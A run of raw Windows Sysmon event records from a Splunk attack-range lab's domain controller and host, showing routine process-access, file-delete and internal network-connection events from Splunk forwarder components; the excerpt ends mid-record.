10:42:21.133{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286262Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:21.133{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286261Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:21.133{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0F8D-6216-D204-000000003802}5512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286260Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:21.133{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F8D-6216-D204-000000003802}5512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286259Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:21.134{C8EA50B7-0F8D-6216-D204-000000003802}5512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286269Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:22.727{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7325A4790191D1E8806CB41C1EAFF0D1,SHA256=6A1F157EF222510524F3C5E635639FFC3B984C67ACB3DD5BA70653D4288BBAAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215175Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:22.409{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2DAEF15BB871D91A897BBC5CB10BE83,SHA256=8CF902389BE5FDEA89E1A8796880DF9724AF08016D2785BF3514E39AEB050597,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286270Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:23.742{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11A553F839105F1DCB4672B8A52BE1F4,SHA256=E4253DB0EAA50B06BC4482A0E24997B53AEB75E811BD92F794BC881D489A207F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215176Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:23.409{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70CE1A12DA486BF710FCB4B49F9B9388,SHA256=518B4926F8D59866B4FE961DD0861CFE7DF1ECE7D48F1CF59A56172B4DF653FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286271Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:24.789{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CA5061A72B18E5AC59259ECC4BB0E00,SHA256=09380BA7D00CD23879AF65E652B5825CBB496763B70411643DE9BC7DFF8D8017,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215178Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:24.425{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EDCFC9EFA0BA57E1B04E5826C1AC4E2,SHA256=DB76D1E3EF888B579D73E886DDE23A974CC26AEFAD0FC4953FF5B93958EABAD2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215177Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:21.504{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51240-false10.0.1.12-8000- 23542300x8000000000000000286272Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:25.805{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63A25420CCC3DDAECCE974AE9BFBF5DF,SHA256=24CC642961B18053A3B767D5ED584E00BE4D6E51D3595E0758183B224DE843A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215179Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:25.425{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A7C8BBFC5A741F77AC4866BCCE85D14,SHA256=A14E81E16007C4726D4C0299A598D0FF58502796ED00A1A7567344242ABDAFCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286273Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:26.820{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCE6412C5829FC3AE25F8E2F9528BAE2,SHA256=3D2CC33AE9B2F2D2B86ECCE7FCF4FB00EB27D5DB55C3F4567C612BB74B0D524D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215180Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:26.440{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77C2BCB9C7CF716E1F9EF5030D4BBF33,SHA256=D5C7766595A968E4308F7080A5BFAA25C680E985C69827F1C08150408AD1D46F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286275Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:27.914{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F9F697A257AA7D20D561E1F7A50AB06,SHA256=7E4229714695C658C5F4CEC308E010A23F71FBF8995ED58988BBFFAA004FD405,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215181Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:27.456{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=771090065406E579B58AD8DFA93F2273,SHA256=13F8642EC6447EC341289278DB1B1E2C87CC849E689F0D7FC5813136B1E06977,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286274Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:24.718{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53315-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286276Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:28.977{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85B39494099377E7A3152BE78AB69FEA,SHA256=B546FCA8B38129A628EAE7E3F5841FD5B5FBE8153E5427C7ADC7C689C495965C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215183Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:26.660{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51241-false10.0.1.12-8000- 23542300x8000000000000000215182Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:28.456{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=152F43FC2DD58E68B2285C227E02FDE7,SHA256=65C772352B1A00A15A70ACE4A6566B3E67948731854FC321B763B2E9DD077ECC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286277Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:29.992{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EABF6C95CED3452672101606B223BB5,SHA256=02CE39FAD847A797BD98AE6955CCB4C5CDDAA4066800CFA779AD7032F341C68E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215184Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:29.472{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B220231146E177708A48AB2449344E1B,SHA256=0410DC79F18955540B0CEB7F0D452C867C33208945BD57FB767DE286230F4486,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215186Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:30.488{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05D5AE24AF679661C30D92FE6C7B9FBC,SHA256=5D882FDD087310651227C8171B11B57649AF7CDCE2E33309511D5CBB39FE2B95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215185Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:30.253{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=FDF234E9D6B11F102EE84130E98EE022,SHA256=D9EC1EB663DA849E9633B97CC7EA8C978D193A8811D9568B5BB444ABE5654461,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215187Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:31.503{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2A57D2503A339128B67BA703F2412F6,SHA256=8AD1F9DD01AD6BB79C8E030CA9424DC48CCA7B9F7EA91EEA5D8C204E06B75A67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286278Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:31.008{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52202F2B0F91F692EF405CE397FE55A3,SHA256=19D970F8AC1CFB8B6DC7D760063E4EA4551CF09E00B3A4FF5E3670A3BCFFA001,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215188Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:32.503{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14FCA6BF05B1174B588FA84AFD3E1826,SHA256=295E088D94C8807C370AE0354FEE04CB941BED0FA8C5CF98ED04097FC52AA1CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286281Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:32.805{C8EA50B7-F11F-6215-1000-000000003802}3642020C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286280Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:32.805{C8EA50B7-F11F-6215-1000-000000003802}3642020C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286279Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:32.008{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=432EE3114F156D8E7B6D12B5023A1FBA,SHA256=D65C3C378427D1FC3227F4F1D9FFCE53B21B77CB3A1CD209D6C1EBACF3D473F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215189Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:33.518{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C977F0821690CFB4270019706DC8143,SHA256=87465A3A1AC84ED3C909DE0B55A1B35F6D275F4DA9F534D48B8002296C2DF7AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286284Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:33.305{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=577A88E286071AA4DEE06AD3CBDD84F2,SHA256=3BE0646FFBBD9EB0B8E446AAE21678531488424991218B40909EC76211518072,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286283Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:30.686{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53316-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286282Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:33.024{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FB9BACD2E0FFAFB5D1C4DA32E1883A6,SHA256=B4853209AF2A83247DEAB051A6B720173E97E98EB4DE63B363312F54ADA6CF14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215190Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:34.520{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=918236B5D91879DF53BBA8978FDD3189,SHA256=FFA343E21832BBB49A3AE8D417A9A0F4529E1F674828C2C1E5D7AF503EDEC007,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286285Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:34.024{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCA3F994687E394E67D8AE6DDE768956,SHA256=A262D5C4EF9538D4A8993D6BD70EABC1476EAD72AA6162544DD3944E914C08CD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215192Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:32.551{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51242-false10.0.1.12-8000- 23542300x8000000000000000215191Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:35.535{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2A36194CC06498602904832991D74FC,SHA256=DC6C1D5A4BA2B9492E4BAF2CC9FED9B61A5FC840676DD940506C3A7AD06B63F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286286Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:35.039{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1E85989D6CF33EEF6EC2CBC5D531947,SHA256=D30B59C139EDDD1E89CCBBD9FCD23D3C4F6F835FDF444B0F63A721AF04619CC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215193Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:36.551{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=429A6423E3FF11B247687FB0E94D4BF0,SHA256=D153B5E6F1637D12BFD712643E086AC450277B30188A59A547E08091B0FEEDD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286287Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:36.055{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=680669FC5049F44F5068A5560B431698,SHA256=1B21D1A2E43F11652AC6F46AF0D86BBB1D853F18CAFBF832BC9792E4DD1DC0C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215194Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:37.566{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 